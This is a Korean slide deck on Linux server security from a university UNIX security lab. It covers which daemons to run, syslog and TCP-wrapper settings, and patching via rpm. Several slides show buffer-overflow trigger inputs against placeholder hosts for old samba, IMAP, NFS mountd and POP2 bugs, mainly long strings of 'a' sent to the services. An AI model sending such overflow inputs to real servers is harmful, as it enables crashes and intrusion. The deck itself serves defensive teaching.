오 태 호 POSTECH Laboratory for UNIX Security ohhara@postech.edu 리눅스(Linux) 보안 오 태 호 POSTECH Laboratory for UNIX Security ohhara@postech.edu
목차 각종 데몬의 용도 몇 가지 보안 관련 설정 알려진 치명적인 버그들 버그 패치 방법
각종 데몬의 용도 (1) amd ( X ) bootparamd ( X ) gated ( X ) auto mount 데몬 오래된 Sun workstation을 network booting 할 때 사용 gated ( X ) routing 데몬
각종 데몬의 용도 (2) httpd ( O ) ircd ( X ) lpd ( O ) WWW ( World Wide Web ) 데몬 ircd ( X ) irc ( Internet relay chat ) 데몬 lpd ( O ) print를 할 때 사용하는 데몬
각종 데몬의 용도 (3) mcserv ( X ) named ( X ) nfs ( O ) mc ( midnight commander ) 데몬 named ( X ) DNS 서버 nfs ( O ) 다른 Unix계열 OS와 파일공유를 할 때 사용
각종 데몬의 용도 (4) portmap ( O ) routed ( X ) sendmail ( O ) RPC 서비스를 제공하는데 필요 routed ( X ) RIP을 지원하는 라우팅 데몬 sendmail ( O ) email을 받을 때 필요
각종 데몬의 용도 (5) smb ( O ) snmp ( X ) squid ( X ) MS Windows 계열 OS에서 Linux에 있는 파일이나 프린트를 사용할 때 사용 snmp ( X ) SNMP ( Simple Network Management Protocol ) 으로 네트워크 상황을 모니터링할 때 사용 squid ( X ) HTTP, FTP등의 서비스를 캐싱할 때 사용
각종 데몬의 용도 (6) syslog ( O ) xntpd ( X ) inet ( O ) 시스템에서 일어나는 일들을 기록하는 데몬 xntpd ( X ) 시간을 정확히 맞추어 주는 데몬 inet ( O ) telnet, ftp등의 서비스를 제공해 주는 데몬
각종 데몬의 용도 (7) inet ftp ( O ) telnet ( O ) gopher ( X ) shell ( X ) login ( X ) talk / ntalk ( X ) pop-2 / pop-3 ( X )
각종 데몬의 용도 (8) inet ( cont. ) imap ( X ) finger ( X ) time ( X ) auth ( X )
몇 가지 보안 관련 설정 (1) /etc/syslog.conf *.debug /dev/console /etc/smb.conf *.debug /dev/console *.debug @141.223.1.4 *.debug /var/log/syslog/syslog hosts allow = 141.223.
몇 가지 보안 관련 설정 (2) /etc/hosts.deny /etc/hosts.allow ALL:ALL: spawn ((/usr/sbin/safe_finger -l @%h | /bin/mail root)&) in.telnetd: 141.223., 127.0.0.1 in.ftpd: 141.223., 127.0.0.1 portmap: 141.223., 127.0.0.1 rpc.mountd: 141.223., 127.0.0.1 rpc.nfsd: 141.223., 127.0.0.1
알려진 치명적인 버그들 (1) samba ( smbd ) $ smbclient \\\\VICTIM\\IPC$ aaaaa…(3100개)…aaaaa -I victim.com
알려진 치명적인 버그들 (2) bind ( named ) inverse query할 때 buffer overflow발생
알려진 치명적인 버그들 (3) imap ( imapd ) $ telnet victim.com 143 Trying XXX.XXX.XXX.XXX… Connected to victim.com. Escape character is ‘^]’. * OK victim.com IMAP4rev1 vXX.XXX server ready 1300 LOGIN “aaaaa…(1300개)…aaaaa” pass $ telnet victim.com 143 Trying XXX.XXX.XXX.XXX… Connected to victim.com. Escape character is ‘^]’. * OK victim.com IMAP4rev1 vXX.XXX server ready * AUTHENTICATE {1100} aaaaa…(1100개)…aaaaa
알려진 치명적인 버그들 (4) nfs-server ( mountd ) $ mount -t nfs victim.com:aaaaa…(1000개)…aaaaa /blahblah
알려진 치명적인 버그들 (5) wu-ftpd ( in.ftpd ) 1024이상의 길이를 가진 directory를 만들고 지울 때 buffer overflow발생
알려진 치명적인 버그들 (6) imap ( ipop2d ) $ telnet target.com 109 Trying XXX.XXX.XXX.XXX... Connected to target.com. Escape character is '^]'. + POP2 target.com vX.XX server ready HELO target.com:ohhara ohharapass FOLD aaaaa...(1000개)...aaaaa
버그 패치 방법 패치 방법 권장 해당 프로그램을 homepage에서 받아 온다. http://www.redhat.com/corp/support/errata/index.html rpm -Uvh (package name) 을 각각 해 준다. 권장 가능하면 홈페이지에 올라오는 모든 패키지들을 주기적으로 업그레이드해 준다.